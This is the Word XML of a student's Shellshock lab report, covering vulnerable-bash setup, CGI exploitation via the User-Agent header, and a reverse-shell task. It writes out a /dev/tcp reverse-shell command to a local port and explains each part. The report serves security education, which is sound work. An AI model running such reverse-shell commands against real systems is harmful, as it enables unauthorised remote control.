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AD1101" w14:textId="77777777" w:rsidR="00055B14" w:rsidRDefault="001B5E15" w:rsidP="001B5E15">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>SHELLSHOCK LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7272093C" w14:textId="77777777" w:rsidR="001B5E15" w:rsidRDefault="001B5E15" w:rsidP="001B5E15">
      <w:r>
        <w:t>NAME: JASHWANTH REDDY GANGULA</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>SUID: 646254141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD933A4" w14:textId="77777777" w:rsidR="001B5E15" w:rsidRDefault="001B5E15" w:rsidP="001B5E15"/>
    <w:p w14:paraId="495DA1EB" w14:textId="7860148D" w:rsidR="00DB4510" w:rsidRDefault="00DB4510" w:rsidP="001B5E15">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19016833" wp14:editId="194FF63C">
            <wp:extent cx="5943600" cy="3714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irtualBox_SEEBUbuntu_10_10_2017_23_05_15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61857" w14:textId="77777777" w:rsidR="00DB4510" w:rsidRDefault="00DB4510" w:rsidP="001B5E15"/>
    <w:p w14:paraId="50D1BC7E" w14:textId="3FA038C5" w:rsidR="00DB4510" w:rsidRDefault="00DB4510" w:rsidP="001B5E15">
      <w:r>
        <w:t xml:space="preserve">The above image contains the initial setup requirements like enable </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cgi ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start Apache server,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939207E" w14:textId="29C65612" w:rsidR="00DB4510" w:rsidRDefault="00DB4510" w:rsidP="001B5E15">
      <w:r>
        <w:t>Download the bash containing the vulnerability of shellshock(since it is fixed in dash program) using wget. Make it an executable, link the /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> program to vulnerable bash program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07141DC2" w14:textId="77777777" w:rsidR="00DB4510" w:rsidRDefault="00DB4510" w:rsidP="001B5E15"/>
    <w:p w14:paraId="27B91102" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="01CE4CC0" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="62631F1D" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="0FAD92AD" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="10E0B9FD" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="184BC8CC" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="2E630231" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="2757E19A" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="71769594" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="6D55374A" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="7936FAB4" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="4D3CD017" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="3107D035" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="13CB5088" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="79DD2B9F" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="34DF7823" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="7C10967A" w14:textId="29821091" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15">
      <w:r>
        <w:t>Task1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ABF5A8" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="2369B644" w14:textId="23A5A400" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24915D82" wp14:editId="780D0CAB">
            <wp:extent cx="5943600" cy="3714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VirtualBox_SEEBUbuntu_11_10_2017_08_26_08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BF97D" w14:textId="77777777" w:rsidR="0028332E" w:rsidRDefault="0028332E" w:rsidP="001B5E15"/>
    <w:p w14:paraId="5A02CDC7" w14:textId="6A299D8F" w:rsidR="0028332E" w:rsidRDefault="00702AEA" w:rsidP="001B5E15">
      <w:r>
        <w:t xml:space="preserve">CGI is utilized </w:t>
      </w:r>
      <w:r w:rsidR="00BF14AD">
        <w:t>by webservers to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> run executable programs that generate dynamic web </w:t>
      </w:r>
      <w:r w:rsidR="00557619">
        <w:t>pages. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cgi scripts use bash shell which is prone to shellshock attacks. We place the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>myprog.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in /usr/lib/cg-bin and set its permissions to 755.This is also default folder for Apache Web server.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Using curl we can send http requests with HTTP_USER_AGENT variable …. </w:t>
      </w:r>
      <w:r w:rsidR="00F51AC2">
        <w:t xml:space="preserve"> When Apache forks c a child process to execute the CGI program</w:t>
      </w:r>
      <w:r w:rsidR="00782866">
        <w:t xml:space="preserve">, it passes HTTP_USER_AGENT variable along with other environment variables, to CGI program. </w:t>
      </w:r>
      <w:r w:rsidR="00557619">
        <w:t xml:space="preserve">Because of the error in parsing logic by the bash, it considers whatever is within the user_agent </w:t>
      </w:r>
      <w:r w:rsidR="00F76301">
        <w:t>variable (“starts with format () {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F76301">
        <w:t>”)</w:t>
      </w:r>
      <w:r w:rsidR="00557619">
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00557619">
        <w:t xml:space="preserve"> passes this </w:t>
      </w:r>
      <w:r w:rsidR="00F76301">
        <w:t>function.</w:t>
      </w:r>
      <w:r w:rsidR="00557619">
        <w:t xml:space="preserve"> The command “/bin/ls –l” is also executed in addition</w:t>
      </w:r>
      <w:r w:rsidR="00F76301">
        <w:t xml:space="preserve"> to the function definition. So </w:t>
      </w:r>
      <w:r w:rsidR="00557619">
        <w:t xml:space="preserve">we get the list of all the files inside /usr/lib/cgi-bin folder. </w:t>
      </w:r>
      <w:r w:rsidR="00F76301">
        <w:t>The command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “strings /proc/$$/environ” in the last line prints out all th</w:t>
      </w:r>
      <w:r w:rsidR="00557619">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> environment variables of a process, where $$ will be replace by bash with ID of current process.</w:t>
      </w:r>
      <w:r w:rsidR="006307A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="49AED498" w14:textId="77777777" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15"/>
    <w:p w14:paraId="531EA342" w14:textId="77777777" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15"/>
    <w:p w14:paraId="596A0539" w14:textId="77777777" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15"/>
    <w:p w14:paraId="53574B46" w14:textId="77777777" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15"/>
    <w:p w14:paraId="56EFA807" w14:textId="77777777" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15"/>
    <w:p w14:paraId="430DE817" w14:textId="77777777" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15"/>
    <w:p w14:paraId="078D8224" w14:textId="77777777" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15"/>
    <w:p w14:paraId="5AC65301" w14:textId="77777777" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15"/>
    <w:p w14:paraId="056B227C" w14:textId="77777777" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15"/>
    <w:p w14:paraId="7A16AFB5" w14:textId="6885FBA5" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15">
      <w:r>
        <w:t>Task2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19457D90" w14:textId="77777777" w:rsidR="00854005" w:rsidRDefault="00854005" w:rsidP="001B5E15"/>
    <w:p w14:paraId="17F9E2FE" w14:textId="2F292DA0" w:rsidR="008676E0" w:rsidRDefault="00854005" w:rsidP="001B5E15">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59C82279" wp14:editId="5010381D">
            <wp:extent cx="5943600" cy="3714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VirtualBox_SEEBUbuntu_11_10_2017_09_16_0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FA997" w14:textId="77777777" w:rsidR="008676E0" w:rsidRDefault="008676E0" w:rsidP="001B5E15"/>
    <w:p w14:paraId="654FBEC0" w14:textId="3CA8BE67" w:rsidR="00CA4B56" w:rsidRDefault="00CA4B56" w:rsidP="001B5E15">
      <w:r>
        <w:t>Here we have two terminals. Assume the top one is at</w:t>
      </w:r>
      <w:r w:rsidR="0074442C">
        <w:t xml:space="preserve">tacker </w:t>
      </w:r>
      <w:r w:rsidR="001E65E0">
        <w:t>terminal,</w:t>
      </w:r>
      <w:r w:rsidR="0074442C">
        <w:t xml:space="preserve"> and the bottom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> terminal is server terminal</w:t>
      </w:r>
      <w:r w:rsidR="0074442C">
        <w:t xml:space="preserve">. The attacker terminal will block, waiting for new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0074442C">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0074442C">
        <w:t xml:space="preserve"> connection on port 7070.</w:t>
      </w:r>
      <w:r w:rsidR="00D95217">
        <w:t xml:space="preserve"> The exploit in the second terminal </w:t>
      </w:r>
      <w:r w:rsidR="00836AED">
        <w:t>will trigger a TCP connection to attacker machine port 7070 and creates a reverse shell.</w:t>
      </w:r>
      <w:r w:rsidR="002274A8">
        <w:t xml:space="preserve"> The command “/bin/bash –I /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002274A8">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002274A8">
        <w:t xml:space="preserve">/127.0.0.1/7070 0&lt;&amp;1 2&gt;&amp;1” </w:t>
      </w:r>
      <w:r w:rsidR="00EB2CEF">
        <w:t>explanation</w:t>
      </w:r>
      <w:r w:rsidR="002274A8">
        <w:t xml:space="preserve"> is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E0967" w14:textId="77777777" w:rsidR="002274A8" w:rsidRDefault="002274A8" w:rsidP="001B5E15"/>
    <w:p w14:paraId="08DBD244" w14:textId="21C6C544" w:rsidR="002274A8" w:rsidRDefault="002274A8" w:rsidP="001B5E15">
      <w:r>
        <w:t>“/bin/bash –I” -&gt; the option I is interactive, meaning shell must be interactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D12F26" w14:textId="77817BDE" w:rsidR="002274A8" w:rsidRDefault="002274A8" w:rsidP="002274A8">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“ &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/127.0.0.1/7070”: This causes the standard output of the shell to be redirected to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> connection to 7070 on attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5553ED" w14:textId="26A6CC56" w:rsidR="002274A8" w:rsidRDefault="002274A8" w:rsidP="002274A8">
      <w:r>
        <w:t xml:space="preserve">“0 &lt;&amp;1”: File descriptor 0 is the standard input device. This option tells the system to use standard output device as standard input </w:t>
      </w:r>
      <w:r w:rsidR="008D3C64">
        <w:t xml:space="preserve">device. But </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008D3C64">
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D3C64">
        <w:t xml:space="preserve"> is already redirected to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008D3C64">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D3C64">
        <w:t xml:space="preserve"> connection. So the shell program also gets the input from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008D3C64">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D3C64">
        <w:t xml:space="preserve"> connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F9CD8A" w14:textId="4F14303E" w:rsidR="008D3C64" w:rsidRDefault="008D3C64" w:rsidP="002274A8">
      <w:r>
        <w:t xml:space="preserve">“2&gt;&amp;1”: File descriptor 2 represents the standard error </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stderr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. This causes the error output to be redirected to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, which is TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008D3C64" w:rsidSect="002243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C16F72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="022815E6"/>
    <w:lvl w:ilvl="0" w:tplc="EB6AEF4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5E15"/>
    <w:rsid w:val="001B5E15"/>
    <w:rsid w:val="001E65E0"/>
    <w:rsid w:val="00200B2C"/>
    <w:rsid w:val="0022431A"/>
    <w:rsid w:val="002274A8"/>
    <w:rsid w:val="0028332E"/>
    <w:rsid w:val="00432ECB"/>
    <w:rsid w:val="00557619"/>
    <w:rsid w:val="006307A2"/>
    <w:rsid w:val="00702AEA"/>
    <w:rsid w:val="0074442C"/>
    <w:rsid w:val="00782866"/>
    <w:rsid w:val="00836AED"/>
    <w:rsid w:val="00854005"/>
    <w:rsid w:val="008676E0"/>
    <w:rsid w:val="008D3C64"/>
    <w:rsid w:val="00B4757D"/>
    <w:rsid w:val="00B7604B"/>
    <w:rsid w:val="00BF14AD"/>
    <w:rsid w:val="00C10C72"/>
    <w:rsid w:val="00CA4B56"/>
    <w:rsid w:val="00D95217"/>
    <w:rsid w:val="00DB4510"/>
    <w:rsid w:val="00E333DC"/>
    <w:rsid w:val="00EB2CEF"/>
    <w:rsid w:val="00F3103C"/>
    <w:rsid w:val="00F51AC2"/>
    <w:rsid w:val="00F76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41D9C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74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360</Words>
  <Characters>2053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Jashwanth Reddy Gangula</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jashwanth Reddy Gangula</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-11T03:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-09T21:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>